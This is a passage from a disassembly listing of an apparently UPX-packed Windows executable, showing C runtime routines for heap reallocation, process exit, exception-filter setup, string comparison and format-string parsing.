; ---------------------------------------------------------------------------
loc_41E632: ; CODE XREF: sub_41E51D+CD�j
test ch, 0C0h
jnz short loc_41E61F
or ecx, 8000h
loc_41E63D: ; CODE XREF: sub_41E51D+44�j
; sub_41E51D+84�j ...
inc edi
mov al, [edi]
cmp al, bl
jnz loc_41E566
loc_41E648: ; CODE XREF: sub_41E51D+4B�j
push 1A4h
push [ebp+arg_8]
push ecx
push [ebp+arg_0]
call sub_4225B0
mov ecx, eax
add esp, 10h
cmp ecx, ebx
jge short loc_41E666
loc_41E662: ; CODE XREF: sub_41E51D+25�j
xor eax, eax
jmp short loc_41E680
; ---------------------------------------------------------------------------
loc_41E666: ; CODE XREF: sub_41E51D+143�j
mov eax, [ebp+arg_C]
inc dword_44BEBC
mov [eax+0Ch], esi
mov [eax+4], ebx
mov [eax], ebx
mov [eax+8], ebx
mov [eax+1Ch], ebx
mov [eax+10h], ecx
loc_41E680: ; CODE XREF: sub_41E51D+147�j
pop edi
pop esi
pop ebx
leave
retn
sub_41E51D endp
; =============== S U B R O U T I N E =======================================
sub_41E685 proc near ; CODE XREF: sub_41A03E+18�p
; sub_41A89B:loc_41AA0C�p ...
call sub_41B330
add eax, 8
retn
sub_41E685 endp
; =============== S U B R O U T I N E =======================================
sub_41E68E proc near ; CODE XREF: sub_41DD29+8A�p
; sub_41DF58+13F�p ...
call sub_41B330
add eax, 0Ch
retn
sub_41E68E endp
; =============== S U B R O U T I N E =======================================
sub_41E697 proc near ; CODE XREF: sub_41DCA6+73�p
; sub_41DF58+17E�p ...
arg_0 = dword ptr 4
push esi
call sub_41B330
mov ecx, [esp+4+arg_0]
mov [eax+0Ch], ecx
xor esi, esi
loc_41E6A6: ; CODE XREF: sub_41E697+1C�j
cmp ecx, dword_42A850[esi*8]
jz short loc_41E6CD
inc esi
cmp esi, 2Dh
jb short loc_41E6A6
cmp ecx, 13h
jb short loc_41E6DE
cmp ecx, 24h
ja short loc_41E6DE
call sub_41B330
mov dword ptr [eax+8], 0Dh
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E6CD: ; CODE XREF: sub_41E697+16�j
call sub_41B330
mov ecx, dword_42A854[esi*8]
mov [eax+8], ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E6DE: ; CODE XREF: sub_41E697+21�j
; sub_41E697+26�j
cmp ecx, 0BCh
jb short loc_41E6FC
cmp ecx, 0CAh
ja short loc_41E6FC
call sub_41B330
mov dword ptr [eax+8], 8
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E6FC: ; CODE XREF: sub_41E697+4D�j
; sub_41E697+55�j
call sub_41B330
mov dword ptr [eax+8], 16h
pop esi
retn
sub_41E697 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E70A proc near ; CODE XREF: sub_41A03E+C�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
push 10h
push offset stru_425558
call __SEH_prolog
xor ebx, ebx
xor edi, edi
mov [ebp+var_1C], edi
push 1
call sub_41D0E7
pop ecx
mov [ebp+ms_exc.disabled], ebx
xor esi, esi
loc_41E72A: ; CODE XREF: sub_41E70A+85�j
mov [ebp+var_20], esi
cmp esi, ds:dword_47D780
jge loc_41E7F9
mov eax, ds:dword_47C778
mov eax, [eax+esi*4]
cmp eax, ebx
jz short loc_41E795
test byte ptr [eax+0Ch], 83h
jnz short loc_41E78E
cmp esi, 2
jle short loc_41E767
cmp esi, 14h
jge short loc_41E767
lea eax, [esi+10h]
push eax
call sub_41D047
pop ecx
test eax, eax
jz loc_41E7F9
loc_41E767: ; CODE XREF: sub_41E70A+44�j
; sub_41E70A+49�j
mov eax, ds:dword_47C778
push dword ptr [eax+esi*4]
push esi
call sub_41AB5D
pop ecx
pop ecx
mov eax, ds:dword_47C778
mov eax, [eax+esi*4]
test byte ptr [eax+0Ch], 83h
jz short loc_41E791
push eax
push esi
call sub_41ABAF
pop ecx
pop ecx
loc_41E78E: ; CODE XREF: sub_41E70A+3F�j
inc esi
jmp short loc_41E72A
; ---------------------------------------------------------------------------
loc_41E791: ; CODE XREF: sub_41E70A+79�j
mov edi, eax
jmp short loc_41E7F6
; ---------------------------------------------------------------------------
loc_41E795: ; CODE XREF: sub_41E70A+39�j
shl esi, 2
push 38h
call sub_419DCB
pop ecx
mov ecx, ds:dword_47C778
mov [esi+ecx], eax
mov eax, ds:dword_47C778
mov eax, [esi+eax]
cmp eax, ebx
jz short loc_41E7F9
push 0FA0h
add eax, 20h
push eax
call sub_421D85
pop ecx
pop ecx
test eax, eax
mov eax, ds:dword_47C778
jnz short loc_41E7E1
push dword ptr [esi+eax]
call sub_419DDD
pop ecx
mov eax, ds:dword_47C778
mov [esi+eax], ebx
jmp short loc_41E7F9
; ---------------------------------------------------------------------------
loc_41E7E1: ; CODE XREF: sub_41E70A+C2�j
mov eax, [esi+eax]
add eax, 20h
push eax
call dword_4241AC ; RtlEnterCriticalSection
mov eax, ds:dword_47C778
mov edi, [esi+eax]
loc_41E7F6: ; CODE XREF: sub_41E70A+89�j
mov [ebp+var_1C], edi
loc_41E7F9: ; CODE XREF: sub_41E70A+29�j
; sub_41E70A+57�j ...
cmp edi, ebx
jz short loc_41E80F
mov [edi+4], ebx
mov [edi+0Ch], ebx
mov [edi+8], ebx
mov [edi], ebx
mov [edi+1Ch], ebx
or dword ptr [edi+10h], 0FFFFFFFFh
loc_41E80F: ; CODE XREF: sub_41E70A+F1�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E823
mov eax, edi
call __SEH_epilog
retn
sub_41E70A endp
; =============== S U B R O U T I N E =======================================
sub_41E820 proc near ; DATA XREF: UPX0:stru_425558�o
mov edi, [ebp-1Ch]
sub_41E820 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E823 proc near ; CODE XREF: sub_41E70A+109�p
push 1
call sub_41D032
pop ecx
retn
sub_41E823 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E82C proc near ; CODE XREF: sub_41A1C1+34�p
; sub_41A1C1+49�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
; FUNCTION CHUNK AT 0041E99D SIZE 0000003C BYTES
push 14h
push offset stru_425568
call __SEH_prolog
mov edi, [ebp+arg_0]
xor ebx, ebx
cmp edi, ebx
jnz short loc_41E84F
push [ebp+arg_4]
call sub_419DCB
pop ecx
jmp loc_41E9D3
; ---------------------------------------------------------------------------
loc_41E84F: ; CODE XREF: sub_41E82C+13�j
mov esi, [ebp+arg_4]
cmp esi, ebx
jnz short loc_41E862
push edi
call sub_419DDD
pop ecx
jmp loc_41E9D1
; ---------------------------------------------------------------------------
loc_41E862: ; CODE XREF: sub_41E82C+28�j
cmp ds:dword_47C774, 3
jnz loc_41E99D
loc_41E86F: ; CODE XREF: sub_41E82C+158�j
mov [ebp+var_1C], ebx
cmp esi, 0FFFFFFE0h
ja loc_41E96C
push 4
call sub_41D0E7
pop ecx
mov [ebp+ms_exc.disabled], ebx
push edi
call sub_41D1CB
pop ecx
mov [ebp+var_20], eax
cmp eax, ebx
jz loc_41E93C
cmp esi, ds:dword_47C760
ja short loc_41E8EC
push esi
push edi
push eax
call sub_41D6CB
add esp, 0Ch
test eax, eax
jz short loc_41E8B4
mov [ebp+var_1C], edi
jmp short loc_41E8EC
; ---------------------------------------------------------------------------
loc_41E8B4: ; CODE XREF: sub_41E82C+81�j
push esi
call sub_41D9AA
pop ecx
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_41E8EC
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_41E8CF
mov eax, esi
loc_41E8CF: ; CODE XREF: sub_41E82C+9F�j
push eax
push edi
push [ebp+var_1C]
call sub_41E1E0
push edi
call sub_41D1CB
mov [ebp+var_20], eax
push edi
push eax
call sub_41D1F6
add esp, 18h
loc_41E8EC: ; CODE XREF: sub_41E82C+72�j
; sub_41E82C+86�j ...
cmp [ebp+var_1C], ebx
jnz short loc_41E93C
cmp esi, ebx
jnz short loc_41E8FB
xor esi, esi
inc esi
mov [ebp+arg_4], esi
loc_41E8FB: ; CODE XREF: sub_41E82C+C7�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push ebx
push ds:dword_47C770
call dword_424198 ; RtlAllocateHeap
mov [ebp+var_1C], eax
cmp eax, ebx
jz short loc_41E93C
mov eax, [edi-4]
dec eax
mov [ebp+var_24], eax
cmp eax, esi
jb short loc_41E926
mov eax, esi
loc_41E926: ; CODE XREF: sub_41E82C+F6�j
push eax
push edi
push [ebp+var_1C]
call sub_41E1E0
push edi
push [ebp+var_20]
call sub_41D1F6
add esp, 14h
loc_41E93C: ; CODE XREF: sub_41E82C+66�j
; sub_41E82C+C3�j ...
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41E994
cmp [ebp+var_20], ebx
jnz short loc_41E96C
cmp esi, ebx
jnz short loc_41E951
xor esi, esi
inc esi
loc_41E951: ; CODE XREF: sub_41E82C+120�j
add esi, 0Fh
and esi, 0FFFFFFF0h
mov [ebp+arg_4], esi
push esi
push edi
push ebx
push ds:dword_47C770
call dword_424164 ; RtlReAllocateHeap
mov [ebp+var_1C], eax
loc_41E96C: ; CODE XREF: sub_41E82C+49�j
; sub_41E82C+11C�j
mov eax, [ebp+var_1C]
cmp eax, ebx
jnz short loc_41E9D3
cmp dword_44C040, ebx
jz short loc_41E9D3
push esi
call sub_41AC3E
pop ecx
test eax, eax
jnz loc_41E86F
jmp short loc_41E9D1
sub_41E82C endp
; =============== S U B R O U T I N E =======================================
sub_41E98C proc near ; DATA XREF: UPX0:stru_425568�o
xor ebx, ebx
mov esi, [ebp+0Ch]
mov edi, [ebp+8]
sub_41E98C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41E994 proc near ; CODE XREF: sub_41E82C+114�p
push 4
call sub_41D032
pop ecx
retn
sub_41E994 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41E82C
loc_41E99D: ; CODE XREF: sub_41E82C+3D�j
; sub_41E82C+1A3�j
xor eax, eax
cmp esi, 0FFFFFFE0h
ja short loc_41E9BA
cmp esi, ebx
jnz short loc_41E9AB
xor esi, esi
inc esi
loc_41E9AB: ; CODE XREF: sub_41E82C+17A�j
push esi
push edi
push ebx
push ds:dword_47C770
call dword_424164 ; RtlReAllocateHeap
loc_41E9BA: ; CODE XREF: sub_41E82C+176�j
cmp eax, ebx
jnz short loc_41E9D3
cmp dword_44C040, ebx
jz short loc_41E9D3
push esi
call sub_41AC3E
pop ecx
test eax, eax
jnz short loc_41E99D
loc_41E9D1: ; CODE XREF: sub_41E82C+31�j
; sub_41E82C+15E�j
xor eax, eax
loc_41E9D3: ; CODE XREF: sub_41E82C+1E�j
; sub_41E82C+145�j ...
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41E82C
; =============== S U B R O U T I N E =======================================
sub_41E9D9 proc near ; CODE XREF: sub_41A4D3+1C�p
; sub_41EA9D+A5�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
push offset aMscoree_dll ; "mscoree.dll"
call dword_424130 ; GetModuleHandleA
test eax, eax
jz short loc_41E9FE
push offset aCorexitprocess ; "CorExitProcess"
push eax
call dword_424100 ; GetProcAddress
test eax, eax
jz short loc_41E9FE
push [esp+0Ch+var_8]
call eax ; dword_428054
loc_41E9FE: ; CODE XREF: sub_41E9D9+D�j
; sub_41E9D9+1D�j
push [esp+10h+var_C]
call dword_42418C ; ExitProcess
int 3 ; Trap to Debugger
sub_41E9D9 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41EA09 proc near ; CODE XREF: sub_41A269+C�p
push 8
call sub_41D0E7
pop ecx
retn
sub_41EA09 endp
; =============== S U B R O U T I N E =======================================
sub_41EA12 proc near ; CODE XREF: sub_41A29B�p
push 8
call sub_41D032
pop ecx
retn
sub_41EA12 endp
; =============== S U B R O U T I N E =======================================
sub_41EA1B proc near ; CODE XREF: sub_41EA9D+78�p
; sub_41EA9D+88�p
arg_0 = dword ptr 4
push esi
mov esi, eax
jmp short loc_41EA2B
; ---------------------------------------------------------------------------
loc_41EA20: ; CODE XREF: sub_41EA1B+14�j
mov eax, [esi]
test eax, eax
jz short loc_41EA28
call eax
loc_41EA28: ; CODE XREF: sub_41EA1B+9�j
add esi, 4
loc_41EA2B: ; CODE XREF: sub_41EA1B+3�j
cmp esi, [esp+4+arg_0]
jb short loc_41EA20
pop esi
retn
sub_41EA1B endp
; =============== S U B R O U T I N E =======================================
sub_41EA33 proc near ; CODE XREF: start-656DB�p
arg_0 = dword ptr 4
mov eax, ds:dword_47C750
test eax, eax
jz short loc_41EA43
push [esp+arg_0]
call eax
pop ecx
loc_41EA43: ; CODE XREF: sub_41EA33+7�j
push esi
push edi
mov ecx, offset dword_428030
mov edi, offset dword_428044
xor eax, eax
cmp ecx, edi
mov esi, ecx
jnb short loc_41EA6E
loc_41EA57: ; CODE XREF: sub_41EA33+35�j
test eax, eax
jnz short loc_41EA9A
mov ecx, [esi]
test ecx, ecx
jz short loc_41EA63
call ecx
loc_41EA63: ; CODE XREF: sub_41EA33+2C�j
add esi, 4
cmp esi, edi
jb short loc_41EA57
test eax, eax
jnz short loc_41EA9A
loc_41EA6E: ; CODE XREF: sub_41EA33+22�j
push offset sub_4204E5
call sub_41A2A1
mov esi, offset dword_428000
mov eax, esi
mov edi, offset dword_42802C
cmp eax, edi
pop ecx
jnb short loc_41EA98
loc_41EA89: ; CODE XREF: sub_41EA33+63�j
mov eax, [esi]
test eax, eax
jz short loc_41EA91
call eax
loc_41EA91: ; CODE XREF: sub_41EA33+5A�j
add esi, 4
cmp esi, edi
jb short loc_41EA89
loc_41EA98: ; CODE XREF: sub_41EA33+54�j
xor eax, eax
loc_41EA9A: ; CODE XREF: sub_41EA33+26�j
; sub_41EA33+39�j
pop edi
pop esi
retn
sub_41EA33 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EA9D proc near ; CODE XREF: sub_41EB60+8�p
; sub_41EB71+8�p ...
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
; FUNCTION CHUNK AT 0041EB5A SIZE 00000006 BYTES
push 8
push offset stru_425590
call __SEH_prolog
push 8
call sub_41D0E7
pop ecx
xor edi, edi
mov [ebp+ms_exc.disabled], edi
xor esi, esi
inc esi
cmp dword_44C088, esi
jnz short loc_41EAD1
push [ebp+arg_0]
call dword_424144 ; GetCurrentProcess
push eax
call dword_42415C ; TerminateProcess
loc_41EAD1: ; CODE XREF: sub_41EA9D+22�j
mov dword_44C084, esi
mov al, byte ptr [ebp+arg_8]
mov byte_44C080, al
cmp [ebp+arg_4], edi
jnz short loc_41EB1B
cmp ds:dword_47C748, edi
jz short loc_41EB0B
loc_41EAEC: ; CODE XREF: sub_41EA9D+68�j
; sub_41EA9D+6C�j
mov eax, ds:dword_47C744
sub eax, 4
mov ds:dword_47C744, eax
cmp eax, ds:dword_47C748
jb short loc_41EB0B
mov eax, [eax]
cmp eax, edi
jz short loc_41EAEC
call eax
jmp short loc_41EAEC
; ---------------------------------------------------------------------------
loc_41EB0B: ; CODE XREF: sub_41EA9D+4D�j
; sub_41EA9D+62�j
push offset dword_428050
mov eax, offset dword_428048
call sub_41EA1B
pop ecx
loc_41EB1B: ; CODE XREF: sub_41EA9D+45�j
push offset dword_42805C
mov eax, offset dword_428054
call sub_41EA1B
pop ecx
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41EB4C
cmp [ebp+arg_8], edi
jnz short loc_41EB5A
mov dword_44C088, esi
push [ebp+arg_0]
call sub_41E9D9
loc_41EB47: ; DATA XREF: UPX0:stru_425590�o
xor edi, edi
xor esi, esi
inc esi
sub_41EA9D endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41EB4C proc near ; CODE XREF: sub_41EA9D+92�p
cmp [ebp+10h], edi
jz short locret_41EB59
push 8
call sub_41D032
pop ecx
locret_41EB59: ; CODE XREF: sub_41EB4C+3�j
retn
sub_41EB4C endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41EA9D
loc_41EB5A: ; CODE XREF: sub_41EA9D+9A�j
call __SEH_epilog
retn
; END OF FUNCTION CHUNK FOR sub_41EA9D
; =============== S U B R O U T I N E =======================================
sub_41EB60 proc near ; CODE XREF: start-6568A�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_41EA9D
add esp, 0Ch
retn
sub_41EB60 endp
; =============== S U B R O U T I N E =======================================
sub_41EB71 proc near ; CODE XREF: sub_41A4AE+1C�p
; UPX0:0041A6B3�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_41EA9D
add esp, 0Ch
retn
sub_41EB71 endp
; =============== S U B R O U T I N E =======================================
sub_41EB82 proc near ; CODE XREF: start:loc_41A68B�p
push 1
push 0
push 0
call sub_41EA9D
add esp, 0Ch
retn
sub_41EB82 endp
; =============== S U B R O U T I N E =======================================
sub_41EB91 proc near ; CODE XREF: UPX0:loc_41A6B8�p
push 1
push 1
push 0
call sub_41EA9D
add esp, 0Ch
retn
sub_41EB91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41EBA0 proc near ; CODE XREF: sub_41A1C1+7�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
push 10h
push offset stru_4255A0
call __SEH_prolog
cmp ds:dword_47C774, 3
jnz short loc_41EBEF
push 4
call sub_41D0E7
pop ecx
and [ebp+ms_exc.disabled], 0
mov esi, [ebp+arg_0]
push esi
call sub_41D1CB
pop ecx
mov [ebp+var_20], eax
test eax, eax
jz short loc_41EBDD
mov esi, [esi-4]
sub esi, 9
mov [ebp+var_1C], esi
jmp short loc_41EBE0
; ---------------------------------------------------------------------------
loc_41EBDD: ; CODE XREF: sub_41EBA0+30�j
mov esi, [ebp+var_1C]
loc_41EBE0: ; CODE XREF: sub_41EBA0+3B�j
or [ebp+ms_exc.disabled], 0FFFFFFFFh
call sub_41EC0D
cmp [ebp+var_20], 0
jnz short loc_41EC02
loc_41EBEF: ; CODE XREF: sub_41EBA0+13�j
push [ebp+arg_0]
push 0
push ds:dword_47C770
call dword_424158 ; RtlSizeHeap
mov esi, eax
loc_41EC02: ; CODE XREF: sub_41EBA0+4D�j
mov eax, esi
call __SEH_epilog
retn
sub_41EBA0 endp
; =============== S U B R O U T I N E =======================================
sub_41EC0A proc near ; DATA XREF: UPX0:stru_4255A0�o
mov esi, [ebp-1Ch]
sub_41EC0A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_41EC0D proc near ; CODE XREF: sub_41EBA0+44�p
push 4
call sub_41D032
pop ecx
retn
sub_41EC0D endp
; =============== S U B R O U T I N E =======================================
sub_41EC16 proc near ; DATA XREF: sub_41EC64�o
; UPX0:0042A2B0�o ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
mov eax, [esi]
cmp dword ptr [eax], 0E06D7363h
jnz short loc_41EC41
cmp dword ptr [eax+10h], 3
jnz short loc_41EC41
mov eax, [eax+14h]
cmp eax, 19930520h
jz short loc_41EC3C
cmp eax, 19930521h
jnz short loc_41EC41
loc_41EC3C: ; CODE XREF: sub_41EC16+1D�j
call sub_41BE81
loc_41EC41: ; CODE XREF: sub_41EC16+D�j
; sub_41EC16+13�j ...
mov eax, dword_44C08C
test eax, eax
jz short loc_41EC5E
push eax
call sub_42153A
test eax, eax
pop ecx
jz short loc_41EC5E
push esi
call dword_44C08C
jmp short loc_41EC60
; ---------------------------------------------------------------------------
loc_41EC5E: ; CODE XREF: sub_41EC16+32�j
; sub_41EC16+3D�j
xor eax, eax
loc_41EC60: ; CODE XREF: sub_41EC16+46�j
pop esi
retn 4
sub_41EC16 endp
; =============== S U B R O U T I N E =======================================
sub_41EC64 proc near ; DATA XREF: UPX0:00428040�o
push offset sub_41EC16
call dword_424154 ; SetUnhandledExceptionFilter
mov dword_44C08C, eax
xor eax, eax
retn
sub_41EC64 endp
; =============== S U B R O U T I N E =======================================
sub_41EC77 proc near ; DATA XREF: UPX0:00428058�o
push dword_44C08C
call dword_424154 ; SetUnhandledExceptionFilter
retn
sub_41EC77 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41EC90 proc near ; CODE XREF: sub_41B5D7+1B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
mov ecx, [esp+arg_4]
test edx, 3
jnz short loc_41ECDC
loc_41ECA0: ; CODE XREF: sub_41EC90+3C�j
; sub_41EC90+6A�j ...
mov eax, [edx]
cmp al, [ecx]
jnz short loc_41ECD4
or al, al
jz short loc_41ECD0
cmp ah, [ecx+1]
jnz short loc_41ECD4
or ah, ah
jz short loc_41ECD0
shr eax, 10h
cmp al, [ecx+2]
jnz short loc_41ECD4
or al, al
jz short loc_41ECD0
cmp ah, [ecx+3]
jnz short loc_41ECD4
add ecx, 4
add edx, 4
or ah, ah
jnz short loc_41ECA0
mov edi, edi
loc_41ECD0: ; CODE XREF: sub_41EC90+18�j
; sub_41EC90+21�j ...
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 4
loc_41ECD4: ; CODE XREF: sub_41EC90+14�j
; sub_41EC90+1D�j ...
sbb eax, eax
shl eax, 1
add eax, 1
retn
; ---------------------------------------------------------------------------
loc_41ECDC: ; CODE XREF: sub_41EC90+E�j
test edx, 1
jz short loc_41ECFC
mov al, [edx]
add edx, 1
cmp al, [ecx]
jnz short loc_41ECD4
add ecx, 1
or al, al
jz short loc_41ECD0
test edx, 2
jz short loc_41ECA0
loc_41ECFC: ; CODE XREF: sub_41EC90+52�j
mov ax, [edx]
add edx, 2
cmp al, [ecx]
jnz short loc_41ECD4
or al, al
jz short loc_41ECD0
cmp ah, [ecx+1]
jnz short loc_41ECD4
or ah, ah
jz short loc_41ECD0
add ecx, 2
jmp short loc_41ECA0
sub_41EC90 endp
; =============== S U B R O U T I N E =======================================
sub_41ED18 proc near ; CODE XREF: sub_41ED2E+6D�p
; sub_41ED2E+27F�p ...
dec dword ptr [edx+4]
js short loc_41ED26
mov ecx, [edx]
movzx eax, byte ptr [ecx]
inc ecx
mov [edx], ecx
retn
; ---------------------------------------------------------------------------
loc_41ED26: ; CODE XREF: sub_41ED18+3�j
push edx
call sub_422605
pop ecx
retn
sub_41ED18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41ED2E proc near ; CODE XREF: sub_41A3A5+2A�p
var_1DC = dword ptr -1DCh
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1CC = word ptr -1CCh
var_1C8 = dword ptr -1C8h
var_1C4 = byte ptr -1C4h
var_1C3 = byte ptr -1C3h
var_1C0 = dword ptr -1C0h
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1B4 = dword ptr -1B4h
var_1B0 = dword ptr -1B0h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_1A1 = byte ptr -1A1h
var_1A0 = dword ptr -1A0h
var_19C = dword ptr -19Ch
var_198 = byte ptr -198h
var_197 = byte ptr -197h
var_196 = byte ptr -196h
var_195 = byte ptr -195h
var_194 = dword ptr -194h
var_18E = byte ptr -18Eh
var_18D = byte ptr -18Dh
var_18C = dword ptr -18Ch
var_185 = byte ptr -185h
var_184 = dword ptr -184h
var_17D = byte ptr -17Dh
var_17C = byte ptr -17Ch
var_17B = byte ptr -17Bh
var_1C = dword ptr -1Ch
ms_exc = CPPEH_RECORD ptr -18h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push 1CCh
push offset stru_4255B0
call __SEH_prolog
mov eax, dword_42A290
mov [ebp+var_1C], eax
xor eax, eax
mov [ebp+var_1BC], eax
mov [ebp+var_1D8], eax
mov [ebp+var_1B0], eax
mov [ebp+var_194], eax
mov [ebp+var_195], al
mov [ebp+var_184], eax
mov [ebp+var_1B8], eax
loc_41ED71: ; CODE XREF: sub_41ED2E+A3�j
; sub_41ED2E+D1D�j ...
mov eax, [ebp+arg_4]
mov al, [eax]
test al, al
jz loc_41FA63
movzx eax, al
push eax
call sub_41A861
pop ecx
test eax, eax
jz short loc_41EDD3
dec [ebp+var_184]
loc_41ED92: ; CODE XREF: sub_41ED2E+7D�j
inc [ebp+var_184]
mov edx, [ebp+arg_0]
call sub_41ED18
mov esi, eax
push esi
call sub_41A861
pop ecx
test eax, eax
jnz short loc_41ED92
cmp esi, 0FFFFFFFFh
jz short loc_41EDBD
push [ebp+arg_0]
push esi
call sub_4226E6
pop ecx
pop ecx
loc_41EDBD: ; CODE XREF: sub_41ED2E+82�j
; sub_41ED2E+A1�j
inc [ebp+arg_4]
mov eax, [ebp+arg_4]
movzx eax, byte ptr [eax]
push eax
call sub_41A861
pop ecx
test eax, eax
jnz short loc_41EDBD
jmp short loc_41ED71
; ---------------------------------------------------------------------------
loc_41EDD3: ; CODE XREF: sub_41ED2E+5C�j
mov esi, [ebp+arg_4]
cmp byte ptr [esi], 25h
jnz loc_41F9CD
xor edi, edi
mov [ebp+var_1A0], edi
mov [ebp+var_198], 0
mov [ebp+var_19C], edi
mov [ebp+var_1B4], edi
mov [ebp+var_18C], edi
mov [ebp+var_1A1], 0
mov [ebp+var_197], 0
mov [ebp+var_18E], 0
mov [ebp+var_17D], 0
mov [ebp+var_196], 0
mov [ebp+var_185], 0
mov [ebp+var_18D], 1
mov [ebp+var_1C8], edi
loc_41EE37: ; CODE XREF: sub_41ED2E+1F3�j
inc esi
movzx ebx, byte ptr [esi]
movzx eax, bl
push eax
call sub_41A7E8
pop ecx
test eax, eax
jz short loc_41EE5B
inc [ebp+var_1B4]
lea eax, [edi+edi*4]
lea edi, [ebx+eax*2-30h]
jmp loc_41EF1A
; ---------------------------------------------------------------------------
loc_41EE5B: ; CODE XREF: sub_41ED2E+119�j
cmp ebx, 4Eh
jg loc_41EEE9
jz loc_41EF1A
cmp ebx, 2Ah
jz short loc_41EEE1
cmp ebx, 46h
jz loc_41EF1A
cmp ebx, 49h
jz short loc_41EE8D
cmp ebx, 4Ch
jnz short loc_41EEF8
inc [ebp+var_18D]
jmp loc_41EF1A
; ---------------------------------------------------------------------------
loc_41EE8D: ; CODE XREF: sub_41ED2E+14D�j
mov cl, [esi+1]
cmp cl, 36h
jnz short loc_41EEB5
lea eax, [esi+2]
cmp byte ptr [eax], 34h
jnz short loc_41EEB5
mov esi, eax
inc [ebp+var_1C8]
and [ebp+var_1AC], 0
and [ebp+var_1A8], 0
jmp short loc_41EF1A
; ---------------------------------------------------------------------------
loc_41EEB5: ; CODE XREF: sub_41ED2E+165�j
; sub_41ED2E+16D�j
cmp cl, 33h
jnz short loc_41EEC6
lea eax, [esi+2]
cmp byte ptr [eax], 32h
jnz short loc_41EEC6
mov esi, eax
jmp short loc_41EF1A
; ---------------------------------------------------------------------------
loc_41EEC6: ; CODE XREF: sub_41ED2E+18A�j
; sub_41ED2E+192�j
cmp cl, 64h
jz short loc_41EF1A
cmp cl, 69h
jz short loc_41EF1A
cmp cl, 6Fh
jz short loc_41EF1A
cmp cl, 78h
jz short loc_41EF1A
cmp cl, 58h
jnz short loc_41EEF8
jmp short loc_41EF1A
; ---------------------------------------------------------------------------
loc_41EEE1: ; CODE XREF: sub_41ED2E+13F�j
inc [ebp+var_18E]
jmp short loc_41EF1A
; ---------------------------------------------------------------------------
loc_41EEE9: ; CODE XREF: sub_41ED2E+130�j
cmp ebx, 68h
jz short loc_41EF0E
cmp ebx, 6Ch
jz short loc_41EF00
cmp ebx, 77h
jz short loc_41EF06
loc_41EEF8: ; CODE XREF: sub_41ED2E+152�j
; sub_41ED2E+1AF�j
inc [ebp+var_17D]
jmp short loc_41EF1A
; ---------------------------------------------------------------------------
loc_41EF00: ; CODE XREF: sub_41ED2E+1C3�j
inc [ebp+var_18D]
loc_41EF06: ; CODE XREF: sub_41ED2E+1C8�j
inc [ebp+var_185]
jmp short loc_41EF1A
; ---------------------------------------------------------------------------
loc_41EF0E: ; CODE XREF: sub_41ED2E+1BE�j
dec [ebp+var_18D]
dec [ebp+var_185]
loc_41EF1A: ; CODE XREF: sub_41ED2E+128�j
; sub_41ED2E+136�j ...
cmp [ebp+var_17D], 0
jz loc_41EE37
mov [ebp+var_18C], edi
mov [ebp+arg_4], esi
cmp [ebp+var_18E], 0
jnz short loc_41EF53
mov eax, [ebp+arg_8]
mov [ebp+var_1DC], eax
add eax, 4
mov [ebp+arg_8], eax
mov ebx, [eax-4]
mov [ebp+var_1B0], ebx
jmp short loc_41EF59
; ---------------------------------------------------------------------------
loc_41EF53: ; CODE XREF: sub_41ED2E+209�j
mov ebx, [ebp+var_1B0]
loc_41EF59: ; CODE XREF: sub_41ED2E+223�j
mov [ebp+var_17D], 0
cmp [ebp+var_185], 0
jnz short loc_41EF81
mov al, [esi]
cmp al, 53h
jz short loc_41EF7A
cmp al, 43h
mov [ebp+var_185], 0FFh
jnz short loc_41EF81
loc_41EF7A: ; CODE XREF: sub_41ED2E+23F�j
mov [ebp+var_185], 1
loc_41EF81: ; CODE XREF: sub_41ED2E+239�j
; sub_41ED2E+24A�j
movzx edi, byte ptr [esi]
or edi, 20h
